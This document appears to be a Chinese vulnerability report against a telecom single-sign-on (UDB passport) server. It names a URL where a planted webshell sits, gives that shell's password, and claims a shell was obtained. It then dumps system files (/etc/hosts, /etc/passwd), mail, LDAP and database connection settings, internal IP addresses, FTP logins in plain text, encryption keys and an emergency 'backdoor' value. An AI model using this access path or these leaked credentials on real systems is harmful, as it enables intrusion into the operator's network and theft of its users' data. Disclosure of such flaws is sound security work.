udb.areaCode|027|城市区号|城市区号|0007|null|null
udb.authCodeLiveTime|180|验证码的有效时间|在校验验证码时要判断有效时间(单位:秒),默认600秒|0006|null|2013-07-18 17:16:14
udb.authenticator|off|是否需要验证认证字开关|认证字开关 on验证认证字,off不验证认证字|0002|null|null
udb.call_nation_count|3|调用SOAPURL 的次数|调用webServices接口的次数|0007|null|null
udb.commit_number|5000|中间表每次同步数据数|配置每次数据库提交记录条数,默认5000条|0006|null|null
udb.contractNumber|null|买方合同号|买方合同号|0008|null|null
udb.deviceName|userDatabase|UDB平台名称|UDB平台全称|0008|null|null
udb.distance|3|配置的时间间隔单位天|配置的时间间隔单位小时|0007|null|null
udb.governor|null|电信主管人员|电信主管人员|0008|null|null
udb.internet.ip.port|localhost:8080|AS在公网映射的IP:端口|第三方邮件激活绑定关系时,是在公网操作,因此该IP为AS对外映射的IP与端口|0006|null|null
udb.invoke_nation_update|on|CRM是否调用全国CRM接口|CRM调用全国更新开关,on调用全国公共更新接口,off调用CRM接口|0002|null|2011-10-10 17:08:38
udb.iptvBinding.lPage|/udb/redirect/jsp/web/iptvBindingLPage.jsp|IPTV绑定大页面|IPTV绑定统一帐号大页面|0006|null|null
udb.iptvBinding.mPage|/udb/redirect/jsp/web/iptvBindingMPage.jsp|IPTV绑定中页面|IPTV绑定统一帐号中页面|0006|null|null
udb.iptvBinding.sPage|/udb/redirect/jsp/web/iptvBindingSPage.jsp|IPTV绑定小页面|IPTV绑定统一帐号小页面|0006|null|null
udb.iptvPage|/udb/redirect/jsp/web/IPTVPassportLogin.jsp|IPTV单点登录大页面|IPTV单点登录大页面|0006|null|null
udb.iptvmPage|/udb/redirect/jsp/web/IPTVloginMiddle.jsp|IPTV单点登录中页面|IPTV单点登录中页面|0006|null|null
udb.iptvsPage|/udb/redirect/jsp/web/IPTVsPassportLogin.jsp|IPTV单点登录小页面|IPTV单点登录小页面|0006|null|null
udb.maintainer|null|电信维护人员|电信维护人员|0008|null|null
udb.nationServerSwitch|on|全国开关|连接全国UDB开关,默认on|0002|null|null
udb.notifySsCancelSoapName|userIDNotifyCancel|udb.notifySsCancelSoapName|CRM通知业务系统注销接口名称|0006|null|null
udb.notifySsSwitch|on|udb.notifySsSwitch|CRM通知业务系统接口开关|0006|null|null
udb.portal_device_no|1800000000000101|自服务设备号|自服务设备号|0006|null|null
udb.provinceNo|18|省份|省份|0006|null|null
udb.serverPath|http://hb.passport.189.cn:8080|省UDB地址|省UDB地址|0006|null|2011-08-30 15:33:21
udb.ss_device_no|1800000000000001|省设备号|省设备号|0006|null|null
udb.ssoPage|/udb/redirect/jsp/web/sPassportLogin.jsp|单点登录小页面|单点登录小页面|0006|null|null
udb.thirdEmailBind.switch|off|通行证帐号绑定第三方邮箱开关|通行证帐号绑定第三方邮箱开关|0002|null|null
udb.ticketSwitch|off|是否保存Ticket开关|on保存到内存中,off保存到数据库|0002|null|null
udb.updatePwdSwitch|off|是否允许修改服务密码开关|udb在crm更新服务密码的开关 on:打开 off:关闭|0002|null|2013-12-27 09:25:27
udbKpiFileDirectory|/home/udbtonetm/udbftpforkpi|存放kpi文件的UDB ftp服务器的文件路径|存放kpi文件的UDB ftp服务器的文件路径|0007|null|2014-05-09 10:19:42
udbWebKpiFiletmpDirectory|/home/udbtonetm/udbftpforwebkpi|存放webkpi文件的UDB ftp服务器的文件路径|存放webkpi文件的UDB ftp服务器的文件路径|0007|null|2014-05-09 10:20:10
weekly.collection.trigger|1|按周统计的kpi数据的采集时间|范围:(1~7),如:配置成1 表示每周一采集按周统计的kpi数据|0007|null|null

漏洞证明:

#1
http://hb.passport.189.cn:8080/jbossws13/
有位亲爱的同学留了个shell
上菜刀连之:
password:gainoverqq

15.jpg


#2
getshell

16.jpg


#3
来看看有哪些东西可以利用的

[/home/as/bin/]$ cat /etc/hosts
#
# hosts This file describes a number of hostname-to-address
# mappings for the TCP/IP subsystem. It is mostly
# used at boot time, when no name servers are running.
# On small systems, this file can be used instead of a
# "named" name server.
# Syntax:
#
# IP-Address Full-Qualified-Hostname Short-Hostname
#
127.0.0.1 localhost
# special IPv6 addresses
::1 localhost ipv6-localhost ipv6-loopback
fe00::0 ipv6-localnet
ff00::0 ipv6-mcastprefix
ff02::1 ipv6-allnodes
ff02::2 ipv6-allrouters
ff02::3 ipv6-allhosts
192.168.103.19 udbas1b.site udbas1b
192.168.103.17 udbas1a
119.103.248.32 hb.passport.189.cn
192.168.1.4 udbas1b.site udbas1b
192.168.1.5 udbas1b.site udbas1b
58.53.194.22 spinterface.hb.vnet.cn


[/home/as/bin/]$ cat /etc/passwd
at:x:25:25:Batch jobs daemon:/var/spool/atjobs:/bin/bash
bin:x:1:1:bin:/bin:/bin/bash
daemon:x:2:2:Daemon:/sbin:/bin/bash
games:x:12:100:Games account:/var/games:/bin/bash
gdm:x:106:110:Gnome Display Manager daemon:/var/lib/gdm:/bin/false
haldaemon:x:101:102:User for haldaemon:/var/run/hald:/bin/false
lp:x:4:7:Printing daemon:/var/spool/lpd:/bin/bash
mail:x:8:12:Mailer daemon:/var/spool/clientmqueue:/bin/false
man:x:13:62:Manual pages viewer:/var/cache/man:/bin/bash
messagebus:x:100:101:User for D-Bus:/var/run/dbus:/bin/false
news:x:9:13:News system:/etc/news:/bin/bash
nobody:x:65534:65533:nobody:/var/lib/nobody:/bin/bash
ntp:x:74:106:NTP daemon:/var/lib/ntp:/bin/false
polkituser:x:103:105:PolicyKit:/var/run/PolicyKit:/bin/false
postfix:x:51:51:Postfix Daemon:/var/spool/postfix:/bin/false
pulse:x:104:107:PulseAudio daemon:/var/lib/pulseaudio:/bin/false
root:x:0:0:root:/root:/bin/bash
sshd:x:71:65:SSH daemon:/var/lib/sshd:/bin/false
suse-ncc:x:105:109:Novell Customer Center User:/var/lib/YaST2/suse-ncc-fakehome:/bin/bash
uucp:x:10:14:Unix-to-Unix CoPy system:/etc/uucp:/bin/bash
uuidd:x:102:104:User for uuidd:/var/run/uuidd:/bin/false
wwwrun:x:30:8:WWW daemon apache:/var/lib/wwwrun:/bin/false
udb:x:1000:100:udb:/home/udb:/bin/bash
ftpsecure:x:107:65534:Secure FTP User:/var/lib/empty:/bin/false
as:x:600:1008::/home/as:/usr/bin/csh
patrol:x:1001:1009::/home/bmc:/bin/sh
udbnetm:x:1002:1008::/home/udbtonetm:/usr/bin/csh
szz:x:1003:1010::/:/bin/bash
unionmon:x:1004:100::/home/unionmon:/bin/bash


配置文件
bme.protocol.properties

##SMTP##
#SMTP address of the mail server
mail.host=smtp.126.com
#SMTP port number that must be an integer. The default port number is 25.
mail.port=25
#Local address (host name) to bind to when creating the SMTP socket. Defaults to
#the address picked by the Socket class. Should not normally need to be set, but
#useful with multi-homed hosts where it's important to pick a particular local address to bind to.
#mail.smtp.localaddress=
#Local port number to bind to when creating the SMTP socket.
#Defaults to the port number picked by the Socket class.
#mail.smtp.localport=
#Socket connection timeout value in milliseconds. Default is infinite timeout.
#mail.smtp.connectiontimeout=
#Socket I/O timeout value in milliseconds. Default is infinite timeout.
#mail.smtp.timeout=
#The initial debug mode. Default is false.
#mail.debug=false
#Mail address of the SMTP user
mail.from=hblhzx@126.com
#User name of the SMTP server
mail.username=hblhzx@126.com
#Password of the SMTP user, password will be encrypted, please see system management developer guide
mail.password=j/GJNSzxGFPnHHjwozUZ1A==
#If true, attempt to authenticate the user using the AUTH command. Defaults to false.
mail.smtp.auth=true
##SMS##
#SenderSms implement. You can also implement the interface manually.
#If input is null, the system will load default SMPP33 implement.
sms.provider=SMGP30
#Short message work dir, default value is under the CLASSPATH
sms.workdir=/home/as/server/default/deploy/BME.war/device
#The directory where the isap log stored, default value is under the workdir
sms.log.dir=./logs
#short message device name, default is smpp3301. This value is configured in smpp3301-device.xml
#Default value is null
sms.device.name=smgp3001
##LDAP Adapter##
#IP address of LDAP,the value is not null
adapter.ip=127.0.0.1
#The port of ldap,default is 1389
adapter.port=1389
#client max connection
adapter.maxConnection=128
adapter.rootDN=dc=bme\,dc=huawei\,dc=com
#simple Authentication
adapter.userName=cn=Manager
#Use of strong authentication encouraged.
adapter.password=5F4DCC3B5AA765D61D8327DEB882CF99
#thread.corePoolSize=5
#thread.maxPoolSize=128
#thread.keepAliveTime=10
#thread.queueCapacity=512


jdbc.properties

#-----------------------------parameter description--------------------------
# driver The driver can be configured "oracle.jdbc.driver.OracleDriver",
# "com.informix.jdbc.IfxDriver", or "com.ibm.db2.jcc.DB2Driver".
#
# url The url ocan be configured "jdbc:oracle:thin:@IP:PORT:SID",
# "jdbc:db2://IP:PORT/databaseName",or "jdbc:informix"
# "-sqli://IP:PORT/databaseName:INFORMIXSERVER=ifx_server_name",
# it must be keep the same with driver.
#
# dbtype The dbtype can be configured "oracle","db2",or "informix",
# it must be keep the same with driver.
#
# testsql The testsql can be configured "select count(*) from dual" for
# oracle, "select * from sysusers" for informix, or
# "select * from sysibm.sysdummy1" for DB2.
#
# password The password must be encrypted by das tool.
#----------------------------------------------------------------------------
bme.driver=oracle.jdbc.driver.OracleDriver
bme.url=jdbc:oracle:thin:@192.168.103.8:1521:udbdb
bme.username=udb
bme.password=QuBASIXOLQeKaSOS63qKrA==
bme.testsql=select count(*) from dual
bme.active = 8
bme.minidle = 8
bme.maxidle = 8
bme.maxwait = -1
bme.checkAfterUsed=true
bme.clientCharset = GBK
#bme.dbCharset = ISO-8859-1
om.driver=oracle.jdbc.driver.OracleDriver
om.url=jdbc:oracle:thin:@192.168.103.8:1521:udbdb
om.username=udb
om.password=QuBASIXOLQeKaSOS63qKrA==
om.testsql=select count(*) from dual
om.active = 8
om.minidle = 8
om.maxidle = 8
om.maxwait = -1
om.checkAfterUsed=true
#bmeXa.driver=oracle.jdbc.driver.OracleDriver
#bmeXa.url=jdbc:oracle:thin:@IP:PORT:SID
#bmeXa.username=username
#bmeXa.password=22221169131C234D0A1B05590AF320CA
#bmeXa.dbtype=oracle
#bmeXa.level=0
#bmeXa.testsql=select count(*) from dual
#bmeXa.checkAfterUsed=true
dtProxy.selfID=602
dtProxy.url1=10.164.124.110:110
dtProxy.url2=10.164.124.111:111
bossProxy.primaryAddress=IP:PORT
bossProxy.failoverAddress=IP:PORT
#bossProxy.userName=
#bossProxy.userPassword=
#tuxedo.primaryAddress=//IP:PORT
#tuxedo.failoverAddress=//IP:PORT
#tuxedo.minPoolSize=2
#tuxedo.maxPoolSize=2
#tuxedo.recvTimeout=10
#tuxedo.userName=
#tuxedo.userPassword=
#tuxedo.userRole=
#tuxedo.appPassword=


configinfo_cache.txt

1800000000100001.CRMInterfaceSoap|http://119.103.248.32:8080/BME/services/CRMInterfaceSoap12?wsdl|1800000000100001.CRMInterfaceSoap|CRM的配置信息|0001|2011-03-04 09:36:17|2012-04-18 15:35:04
1800000000100101.NETURL|http://hb.ct10000.com/|1800000000100101.NETURL|网厅地址|0001|null|2012-06-04 10:11:14
1800000000100501.SSOFROMUDBURL|http://uam.hb.ct10000.com:8080/SSOFromUDB|1800000000100501.SSOFROMUDBURL|UAM提供给UDB专用的单点登录接口地址|0001|null|2011-11-23 15:45:03
1800000000100501.UaUDBServerImplPort|http://uam.hb.ct10000.com:8080/services/ServiceForUDB?wsdl|1800000000100501.UaUDBServerImplPort|在|0001|2011-03-03 18:29:25|2011-11-21 15:26:01
1800000000200101.UDBCommonSoap|http://119.103.248.32:8080/BME/services/UDBCommonSoap12?wsdl|1800000000200101.UDBCommonSoap|互联星空接口|0001|2011-08-30 15:50:56|2011-10-18 11:26:02
1800000000200201.UDBForBNETSoap|http://119.103.248.32:8080/BME/services/UDBForBNETSoap12?wsdl|1800000000200201.UDBForBNETSoap|和领航平台接口|0001|2011-05-09 09:40:12|2011-10-14 10:06:11
1800000000300101.BandWidthAAASoap|http://133.2.32.58:10024/services/BandWidthAAASoap?wsdl|1800000000300101.BandWidthAAASoap|AAA提供的接口地址|0001|2011-10-12 11:39:00|2012-05-22 15:55:00
1800000000402701.UDBCommonSoap|http://133.0.150.76:8081/serviceToUDB/services/UDBSSSoap?wsdl|1800000000402701.UDBCommonSoap|彩铃提供给UDB的接口地址|0001|2013-06-17 09:22:54|2014-03-03 13:05:13
1800000000402801.UDBCommonSoap|http://133.0.150.76:8083/serviceToUDB/services/UDBSSSoap?wsdl|1800000000402801.UDBCommonSoap|彩振提供UDB的接口|0001|2013-07-01 10:01:29|2014-03-03 13:05:21
3500000000000001.ProvinceNationalSoap|http://10.235.198.60:8810/ProvinceNational/ProvinceNational.asmx|3500000000000001.ProvinceNationalSoap|省UDB与全国交互的接口|0001|2011-02-26 10:49:32|2011-10-13 01:26:53
3500000000000001.UDBCommonSoap|http://10.235.198.60:8810/UDBCommon/UDBCommon.asmx|3500000000000001.UDBCommonSoap|公共接口|0001|2011-02-26 10:47:02|2011-10-13 01:26:37
AAAVersion|1|AAA认证接口版本|AAA认证接口版本,0代表3.0版本,1代表3.1版本|0007|null|2011-10-27 10:34:03
BAND_AUTH_ EFFECT_TIME|2|宽带验证码有效期|默认为2小时,配置为空表示长期有效,记录的失效时间为9999-12-31 23:59:59|0006|null|null
BIND_Email_MAXNum|6|Email绑定数|设置领航平台Email默认绑定最大数|0004|null|2011-06-23 13:57:32
BIND_MOBILE_MaxNum|2|异网手机绑定数|设置领航平台异网手机默认绑定最大数|0004|null|null
BIND_USERID_MAXNum|2|统一账号绑定数|设置领航平台统一账号默认绑最大数|0004|null|null
BNET_PWD_EffectiveTime|0|领航平台密码有效期(天)|领航平台密码有效期,0代表长期有效|0004|null|null
BNET_USERID_RESERVE_TIME|10|注销用户数据保留天数|配置注销用户数据保留时间,单位天|0006|2011-04-08 10:45:22|2011-04-08 10:45:22
BROAD_BAND_VALIDATE|0|调用宽带验证接口标识|0:直接返回成功、1:VNET接口,2:Radius接口|0007|null|null
CONSTANT_PASSWORD|999999|固定密码|3A固定密码|0003|null|null
DELAY_TIME|1|定期更新密钥时间|定期更新密钥时间(单位:小时),默认1小时|0007|null|null
DELETE_CANCEL_STATUS_TIME|3|删除拆机状态记录时间|删除拆机状态记录时间(单位:月),默认3个月|0007|null|null
DIVIDE_SIGN|#|批量开户的字符串分割符|批量开户的字符串分割符|0006|null|null
EXT_PASSD_EFFECT_TIME|90|扩展密码有效期|扩展密码有效期(单位:天),默认90天|0003|null|null
HISTORY_RECORD_CLEAR|1,1,00:00:00,00:00:00|定时删除历史记录|定时删除认证历史记录定时配置|0007|null|null
INPUT_PASSWORD_SWITCH|off|UAM多账号密码选择开关|多账号登录密码选择开关,on需要密码,off不需要密码|0002|null|null
IsAgainNotify|off|失败消息重发开关|失败消息重发开关,on为打开,off为关闭,默认off|0002|null|2012-05-09 10:21:27
LocalKpiFilePath|/home/as/kpifile|存放kpi文件的本地路径|存放kpi文件的本地路径,以"/"开头为绝对路径,非"/"开头为相对对路径|0007|null|2014-05-07 14:10:07
MobileSyncFailTime|3|手机账号同步自动重发最大失败次数|手机账号同步自动重发最大失败次数(1-20,默认为5)|0007|2013-07-30 23:16:19|2013-07-30 23:16:19
NATIONAL_CT10000|http://www.ct10000.com|全国网厅链接|全国提供的网厅链接|0001|null|null
NORMAL_PASSWORD_ENCRY_TYPE|1|通用密码加密方法|1:3DES 9:明文传送|0003|null|null
PASSWORD_EFFECT_TIME|99999|通用密码有效期|通用密码有效期(单位:天),默认90天|0003|null|2012-01-09 13:37:25
PASSWORD_FORMAT|2,[6-16]|通用密码格式|1:1-6位数字;2:6-16位数字或字符;3:不控制|0003|null|null
PRIVILEGE.SWITCH|off|AS页面权限控制开关|AS页面权限控制开关,on打开,off关闭|0002|null|null
PWD_VALIDATE_LEVEL|1|密码验证安全级别|0:不控制;1:控制|0003|null|null
PWD_VALIDATE_TYPE|3|验证密码类型|1:IT/通用密码;2:IT密码;3:通用密码;4:通用密码,需要同步到全国|0003|null|null
PrimaryClusterIPs|null|统计kpi数据服务器的IP和端口|双机环境不需要配置,集群环境需要配置所有服务器的IP和端口(包括本机),以","隔开,如:IP1:PORT,IP2:PORT|0007|null|null
RequestTime_Validate|2|WebServices接口超时限制|WebServices接口超时限制(单位:秒),默认2秒|0006|null|null
SS_STAT_TIME|1,2,00:00:00,00:00:00|SS_STAT_TIME|统计认证情况上传全国定时配置|0007|null|null
SYNC_DATAFAILURECLEAR_TIME|60|消息同步失败记录数据保留天数|配置同步消息失败记录保留天数(单位:天),默认60天|0006|null|2011-09-14 04:48:42
ServiceCode|CAP02002|接口协议编码|接口协议编码|0007|null|null
SupportNewAccountLogin|0|IP白名单接口控制|IP白名单接口控制开关,0:走AccountLogin接口流程,1:走NewAccountLogin接口流程,2:新旧接口都能正常使用|0002|2014-04-23 23:54:37|2014-04-23 23:54:37
SwitchWebPage|on|全国页面开关(集团2.5规范)|控制是否跳转到全国页面的开关(集团2.5规范)|0002|2013-07-30 11:07:19|null
SyncInfoToNudbSwitch|on|发送查询或用户同步请求到全国UDB开关(2.5规范)|发送查询或用户同步请求到全国UDB开关(2.5规范),on为打开,off为关闭,默认off|0002|null|null
TICKET_TIME|60|ticket有效期|ticket有效期(单位:秒),默认2秒|0006|null|null
TMP_EFFECT_TIME|60|动态密码有效期|动态密码有效期(单位:秒),默认60秒|0003|null|null
TMP_PROPERTY|0|动态密码属性|0一定时间有效;1一次性有效|0003|null|null
TRANSMIT_PW_STATUS_OFF|off|漫游认证密码策略开关|漫游认证密码策略开关,on表示需要进行业务密码策略认证,off表示不需要|0002|null|null
UDB.CANCELACCOUNT.NOTIFY.SS|on|销户通知应用系统开关|on时,省UDB销户之前是通知已注册应用系统,off时,不通知|0002|null|2011-10-26 11:05:30
UDB.DEL.FAILRECORDER|3|按天数删除同步失败表|删除3天前的同步失败表中的记录,默认值3天|0007|null|null
UDB.GENERATION.VIRTUALACCOUNT.SWITCH|on|对裸宽带生成虚拟帐号开关|对裸宽带生成虚拟帐号开关|0002|null|null
UDB.MONITOR.PERIOD|5|监控周期|一个监控周期对外部网元作一次连接检测,缺省值5分钟|0007|null|null
UDB.MONITOR.TIMEOUT|5000|监控连接超时时间|连接外部网元时连接超时时间,缺省值5000毫秒|0007|null|null
UDB.RECORDS.MAX|500|读取失败重发记录最大数目|读取失败重发记录最大数目,缺省值500|0007|null|null
UDB.USERID.ADDAREACODE.SWITCH|off|验证固话、PHS增加区号开关|是否为不带区号的固话、PHS增加区号|0002|null|2011-10-12 15:57:37
UDB.USERID.CHANGESTATUS.SWITCH|off|CRM同步的状态是否转换|CRM同步的状态是否转换|0002|null|2012-01-10 16:07:16
UDB.UserSyncErrorToCenter.batchOperNum|5000|UDB.UserSyncErrorToCenter.batchOperNum|定时任务重发时一次捞取的条数|0006|2013-07-30 11:07:19|null
UDB.VERIFY.VIRTUALACCOUNT.SWITCH|off|验证裸宽带生成虚拟账号开关|是否验证裸宽带所生成的虚拟账号|0002|null|null
UDB.WARNLOG.PERIOD|60|告警周期|在告警周期内告警数达到一半以上,记录告警日志,缺省值60分钟|0007|null|null
UDB_SHAR_KEY_IV|12345678|偏移向量|UDB内部偏移向量|0006|null|null
UDB_SHAR_PWD_KEY|AAAAA111BBBBB111CCCCC111DDDDD111EEEEE111FFFFF111|UDB内部密钥|UDB内部密钥|0006|null|null
UPDATE_KEY_TIME|10|延长时间|更新密钥延长时间(单位:秒),默认10秒|0007|null|null
USER_COUNT_STAT_TIME|1,2,00:00:00,00:00:00|USER_COUNT_STAT_TIME|用户发展统计信息上传全国定时配置|0007|null|null
UnlockTime|1|领航用户自动解锁时间(分)|领航用户自动解锁时间|0004|null|2011-08-30 15:39:02
UserinfoSyncSaveTime|30|中间表数据保留天数|中间表数据保留天数,默认30天|0007|null|null
Version|CAP0200220090904|操作结果编码|操作结果编码|0007|null|null
aaa.interface_version|1.0/1.2|AAA接口版本号|AAA接口版本号|0008|null|null
aaa.ip|null|AAA IP地址|AAA IP地址|0008|null|null
aaa.port|null|AAA端口号|AAA端口号|0008|null|null
aaa.ss_device_name|null|AAA系统名称|AAA系统名称|0008|null|null
aaa.ss_device_no|null|AAA系统编号|AAA系统编号|0008|null|null
accountRegister|http://passport.189.cn/Services/AccountRegister.aspx|全国中心为省UDB提供的统一帐号注册页面请求地址|全国中心为省UDB提供的统一帐号注册页面请求地址|0001|2013-07-30 11:07:19|null
app.deviceNo|null|应用系统编号|相连应用系统编号,多个以“,”分割|0008|null|null
app.treaty|1.0/1.2|接口协议版本|接口协议版本|0008|null|null
app.udbIP|null|UDB提供给应用系统的IP地址|UDB提供给应用系统连接用的IP地址|0008|null|null
app.udbPort|null|UDB提供给应用系统的端口号|UDB提供给应用系统连接用的端口号|0008|null|null
backdoorConfig|HuaweiMDSP20110606|应急控制项|HuaweiMDSP+日期|0007|null|2014-04-23 11:04:37
bnet.mailActiveHttp|http://119.103.248.32:8080/|邮箱激活链接|领航账户绑定邮箱激活链接|0004|null|2012-06-06 15:57:36
bnet.mailUsefullife|24|邮件激活链接有效期限(小时)|邮件激活链接有效期限,以小时为单位|0004|null|null
bnet.mobileUsefullife|60|异网手机验证码有效期限(秒)|异网手机验证码有效期限,设置为0代表由领航平台维护有效期|0004|null|null
bnet.ss_device_no|1800000000200201|省领航平台设备标识|省领航平台设备标识|0006|null|2011-09-07 10:22:39
chargeTermID|null|计费用户号码|计费用户号码|0005|null|2013-05-15 22:05:03
crm.interface_version|1.0/1.2|CRM接口版本号|CRM接口版本号|0008|null|null
crm.ip|null|CRM IP地址|CRM IP地址|0008|null|null
crm.ss_device_name|null|CRM系统名称|CRM系统名称|0008|null|null
crm.ss_device_no|null|CRM系统编号|CRM系统编号|0008|null|null
crmSyncTableSwitch|on|CRM同步中间表开关|CRM同步中间表开关,默认off|0002|null|null
crm_udb_conn_url|jdbc:oracle:thin:@192.168.103.8:1521:udbdb+udb+udb|CRM数据库连接URL|CRM数据库连接配置格式:jdbc:oracle:thin:@10.40.33.47:1521:MDSP+udbcrm+udbcrm|0006|null|2012-02-24 18:57:06
deleteWErrorLogTableSwitch|off|清除UAM数据同步错误信息表开关|清除UAM数据同步错误信息表开关,默认off|0002|null|null
expStatIp|192.168.103.19|导出接口统计文件存放服务器IP地址|导出文件存放服务器IP地址,默认为10.40.200.23|0006|null|2014-05-12 10:59:31
expStatServerpassword|udbnetm|导出接口统计文件存放服务器密码|导出接口统计文件存放服务器密码,默认为:udbrpt|0006|null|2014-05-12 11:00:12
expStatServeruser|udbnetm|导出接口统计文件存放服务器用户名|导出接口统计文件存放服务器用户名,默认为:udbrpt|0006|null|2014-05-12 11:00:29
expStatpwd|/home/udbtonetm/kpi|导出接口文件存放路径|导出接口文件存放路径,默认为:/home/udbrpt/kpi|0006|null|2014-05-12 11:01:32
isSuportActiveFlag|on|支持2.5规范的ActiveFlag取值开关(2.5规范)|支持2.5规范的ActiveFlag取值开关(2.5规范),on为打开,off为关闭,默认off|0002|null|null
isUpdateStatusList|off|是否更新业务信息|全部更新场景是否更新业务信息|0002|null|null
isWriteInterfaceLog|off|是否需要写接口日志开关|是否需要写接口日志开关,默认为off|0002|2013-07-30 11:07:18|null
isag.interface_version|1.0/1.2|ISAG接口版本号|ISAG接口版本号|0008|null|null
isag.ip|null|ISAG IP地址|ISAG IP地址|0008|null|null
isag.port|null|ISAG端口号|ISAG端口号|0008|null|null
isag.ss_device_name|null|ISAG系统名称|ISAG系统名称|0008|null|null
isag.ss_device_no|null|ISAG系统编号|ISAG系统编号|0008|null|null
ismp.interface_version|1.0/1.2|ISMP接口版本号|ISMP接口版本号|0008|null|null
ismp.ip|null|ISMP IP地址|ISMP IP地址|0008|null|null
ismp.port|null|ISMP 端口号|ISMP 端口号|0008|null|null
ismp.ss_device_name|null|ISMP系统名称|ISMP系统名称|0008|null|null
ismp.ss_device_no|null|ISMP系统编号|ISMP系统编号|0008|null|null
licenseControlSwitch|off|license控制开关|on表示开启,off表示关闭|0002|null|2011-10-31 13:53:56
local.alarm.file.path|/home/as/alarmfile/|存放告警文件的本地路径|存放告警文件的本地路径|0007|null|2014-05-07 14:27:32
localFilePath|/home/as/localWebKpiFile/|webkpi本地路径|webkpi生成的TXT文件本地路径|0007|null|2014-05-07 14:21:26
monthly.collection.trigger|1|按月统计的kpi数据的采集时间|范围:(1~28),如:配置成1 表示每个月1号采集按月统计的kpi数据|0007|null|null
multiUserSwitch|off|江苏多账号登陆开关|江苏多账号登陆开关,开关关闭则弹出多账号选择页面,开关打开不弹出选择页面,默认:off|0002|null|2012-03-20 10:24:20
nation.link.province.udbip|10.233.180.22|相连省UDB平台侧的IP地址|相连省UDB平台侧的IP地址|0008|null|2014-05-07 14:36:28
nation.link.province.udbport|8080|相连省UDB平台侧的端口号|相连省UDB平台侧的端口号|0008|null|2014-05-07 14:37:03
nation.ss_device_no|3500000000000001|全国设备号|全国设备号|0006|null|null
nation.udb.ForgetPWDSetup.url|http://passport.189.cn/Services/ForgetPWDSetup.aspx|全国中心为省UDB提供的标准统一的忘记密码设置页面服务|全国中心为省UDB提供的标准统一的忘记密码设置页面服务|0001|2013-07-30 11:07:19|null
nation.udb.InitPWDSetup.url|http://passport.189.cn/Services/InitPWDSetup.aspx|全国中心为省UDB提供的标准统一的初始密码设置页面服务|全国中心为省UDB提供的标准统一的初始密码设置页面服务|0001|2013-07-30 11:07:19|null
nationudb.interface.version|1.0/1.2|集团UDB接口版本号|集团UDB接口版本号|0008|null|null
nationudb.ip|10.235.198.60|集团UDB平台侧的IP地址|集团UDB平台侧的IP地址|0008|null|2014-05-07 14:38:07
nationudb.port|8810|集团UDB平台侧的端口号|集团UDB平台侧的端口号|0008|null|2014-05-07 14:38:39
nationudb.ss_device_no|3500000000000001|集团设备号|集团设备号|0008|null|null
needPrintAccountInfoRefreshClient|on|是否打印帐号信息更新客户端接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:12
needPrintAccountInfoRefreshService|on|是否打印帐号信息更新服务端接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:24
needPrintAccountLogin|on|是否打印业务认证请求接口统计日志|off为关,on为开|0002|null|2014-05-05 16:15:21
needPrintIPTVPassportCheck|off|是否打印IPTV重定向令牌验证接口统计日志|off为关,on为开|0002|null|null
needPrintIPTVPassportLogin|off|是否打印IPTV重定向认证请求接口统计日志|off为关,on为开|0002|null|null
needPrintPassportCheck|on|是否打印重定向令牌验证接口统计日志|off为关,on为开|0002|null|2014-05-05 16:15:07
needPrintPassportLogin|on|是否打印重定向认证请求接口统计日志|off为关,on为开|0002|null|2014-05-05 16:15:11
needPrintSSOFromUAM|on|是否打印UAM单点登录接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:56
needPrintSSOFromUDB|on|是否打印UDB单点登录接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:50
needPrintUserIDCancelNotify|on|是否打印用户帐号销户通知接口统计日志|off为关,on为开|0002|null|2014-05-05 16:14:38
needPrintUserInfoSync|on|是否打印用户帐号信息同步接口统计日志|off为关,on为开|0002|null|2014-05-05 16:13:22
needPrintWapLogin|on|是否打印Wap重定向认证请求接口统计日志|off为关,on为开|0002|null|2013-07-03 15:28:41
netManager.Cycle|15|采集时间周期|采集时间周期,该值需要与定时任务值相同。定时任务采用毫秒,该值使用分钟|0007|null|null
netManager.defaultPMServiceURL|http://192.168.103.30:18082/pmServicePro_udb/services/PmService?wsdl |网管PMService接口|网管PMService接口|0007|null|2014-05-23 09:37:32
netMgrHostname|192.168.103.30|网管 ftp 服务器地址|网管 ftp 服务器地址|0007|null|2014-05-19 09:10:56
netMgrKpiFileDirectory|/opt/UDB|存放kpi文件的网管 ftp服务器的文件路径|存放kpi文件的网管 ftp服务器的文件路径|0007|null|2014-05-07 15:55:03
netMgrPort|21|网管 ftp 服务器端口号|网管 ftp 服务器端口号,默认为:21|0007|null|2014-05-07 14:09:12
netMgrPwd|udbtaiyue|网管 ftp 登录密码|网管 ftp 登录密码|0007|null|2014-05-07 14:06:45
netMgrUsername|udbtaiyue|网管 ftp 登录名|网管 ftp 登录名|0007|null|2014-05-07 14:06:51
netmgr.alarm.file.path|/home/udbtonetm/doWebBusinessAlarm/|上报网管告警文件存放FTP服务器的路径|上报网管告警文件存放FTP服务器的路径|null|2013-07-30 11:07:18|2014-05-09 10:37:19
netmgr.fmservice.url|http://192.168.103.30:18081/fmwebservice_udb/services/FMService?wsdl|网管告警接口WSDL地址|网管告警接口WSDL地址|null|2013-07-30 11:07:18|2014-05-19 09:13:01
overdueTime|3|配置KPI文件、回执文件过期多久可以删除|配置UDB ftp服务器上的KPI文件和回执文件过期多久可以删除,以月为单位|0007|null|null
smgp_atTime|2011-02-25 13:20:15|短消息定时发送时间|短消息定时发送时间|0005|null|null
smgp_feeCode|00|资费代码|资费代码|0005|null|null
smgp_feeType|00|收费类型|收费类型|0005|null|null
smgp_fixedFee|00|包月费/封顶费|包月费/封顶费|0005|null|null
smgp_msgFormat|15|短消息格式|短消息格式|0005|null|2013-05-15 23:38:37
smgp_msgType|6|短消息类型|短消息类型|0005|null|null
smgp_needReport|0|SP是否要求返回状态报告|SP是否要求返回状态报告|0005|null|null
smgp_priority|2|短消息优先级|短消息优先级|0005|null|null
smgp_serviceID|10659229|业务代码|业务代码|0005|null|2013-05-15 15:56:35
smgp_validTime|5|短消息有效时间|短消息有效时间(单位:分钟),默认1分钟|0005|null|2013-05-16 09:36:51
sms_captcha|@USERID 您好,您的验证码是: @PWD|验证码下发内容|验证码短下发短消息描述|0005|null|2013-05-21 20:29:39
sms_description|@PWD|通用密码下发内容|短消息描述|0005|null|2013-05-16 09:40:41
sms_pwd_description|@PWD|sms_pwd_description|短信动态密码下发|0005|null|2013-05-16 09:40:20
sms_third_pwd_desc|@PWD|sms_third_pwd_desc|第三方密码|0005|null|2013-05-16 09:40:09
